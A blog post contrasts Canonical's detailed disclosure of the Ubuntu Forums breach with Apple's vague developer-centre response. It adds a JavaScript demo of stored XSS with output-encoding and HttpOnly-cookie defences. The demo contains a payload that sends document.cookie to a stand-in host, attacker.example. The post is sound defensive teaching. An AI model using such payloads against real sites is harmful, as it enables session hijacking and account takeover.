Yesterday, Michael Lee wrote a good ZDNet article contrasting the post-breach responses of two companies, Canonical and Apple. Both suffered a breach on the same weekend, but they handled the aftermath in very different ways.
Canonical operates the Ubuntu Forums. Lee writes:
"In its latest announcement, Canonical broke down its understanding of how it believes it had been breached... with a moderator account used to post an announcement on the forum. The announcement itself is believed to have contained a cross-site scripting (XSS) attack, designed to steal the login session information from the victim's browser cookie. The compromised moderator account was then used to message three of the boards' administrators, allowing the attacker to hijack an administrator's login session. Once armed with the administrator's privileges, the attacker then inserted a "hook" in the vBulletin web-forum software to allow them to execute arbitrary code..."
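To make the mechanism in that paragraph concrete, here is an added JavaScript example (mine, not code from the ZDNet article, Canonical, or vBulletin): a toy forum post renderer that shows how an announcement body carrying a script reaches every reader's browser when the body is spliced into the page unencoded, the output-encoded version that neutralises it, and a session cookie issued with HttpOnly so that even a script that does run cannot read the session id through document.cookie. The announcement text, the attacker.example exfiltration URL and the sessionid cookie name are constructed for the example and are not taken from the incident.

```javascript
// Added example, not the forum software's real code. Demonstrates the
// stored-XSS-to-session-theft chain described in the quoted passage and
// two mitigations: output encoding and HttpOnly session cookies.

// Constructed sample: an "announcement" body that carries a cookie-stealing
// payload. The attacker.example URL is hypothetical.
const MALICIOUS_ANNOUNCEMENT =
  "Welcome to the forums! <script>new Image().src=" +
  '"https://attacker.example/steal?c="+encodeURIComponent(document.cookie)</script>';

// Vulnerable pattern: the post body is trusted and spliced in as raw HTML,
// so any reader (including an administrator) executes the attacker's script.
function renderPostUnsafe(author, body) {
  return `<div class="post"><b>${author}</b><div class="body">${body}</div></div>`;
}

// Encode the characters that let text break out of an HTML text node or
// a quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: every user-controlled string is encoded before insertion,
// so the payload is displayed as text instead of being parsed as markup.
function renderPostSafe(author, body) {
  return `<div class="post"><b>${escapeHtml(author)}</b><div class="body">${escapeHtml(body)}</div></div>`;
}

// Illustrative check only: does the markup still contain a <script> element?
// A real deployment would rely on encoding plus a Content-Security-Policy,
// not on scanning rendered output.
function containsScriptElement(html) {
  return /<script[\s>]/i.test(html);
}

// Second layer of defence: issue the session cookie with HttpOnly so that a
// script which does execute cannot read it via document.cookie. Secure and
// SameSite are included because a hardened cookie should carry them too.
function sessionCookieHeader(name, value, { httpOnly = true, secure = true, sameSite = "Lax" } = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`, "Path=/"];
  if (httpOnly) parts.push("HttpOnly");
  if (secure) parts.push("Secure");
  if (sameSite) parts.push(`SameSite=${sameSite}`);
  return parts.join("; ");
}

// Demo: render the same announcement both ways and show a hardened cookie.
console.log("unsafe:", renderPostUnsafe("moderator", MALICIOUS_ANNOUNCEMENT));
console.log("safe:  ", renderPostSafe("moderator", MALICIOUS_ANNOUNCEMENT));
console.log("cookie:", sessionCookieHeader("sessionid", "0123456789abcdef"));
```

The unsafe render leaves the script element intact; the safe render turns it into `&lt;script&gt;...` and the browser shows it as text. The cookie flag matters independently: with HttpOnly set, a payload that slips past encoding (or through a different injection point) still cannot read the session id, which is what the attack on the forum administrators depended on.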
Compare that to this:
"... Apple, in contrast, is still having difficulty in bringing its services back online after its Developer services suffered a security breach on the very same weekend. Despite stating that it was informing customers of the breach "in the spirit of transparency", it has not revealed any information on how the attackers attempted their intrusion. Initially, the company took down its developer centre for two days for no apparent reason, telling users that it was "undergoing maintenance for an extended period". Users later began to suspect foul play when they received unauthorised password reset emails. Apple has managed to bring more of its services back online today..."
Transparency matters. A disclosed attack chain like Canonical's lets other operators of the same forum software check for the same intrusion path, while silence leaves customers guessing, as Apple's developers were when the password reset emails arrived. Consumers expect open, honest, and direct communication after a breach.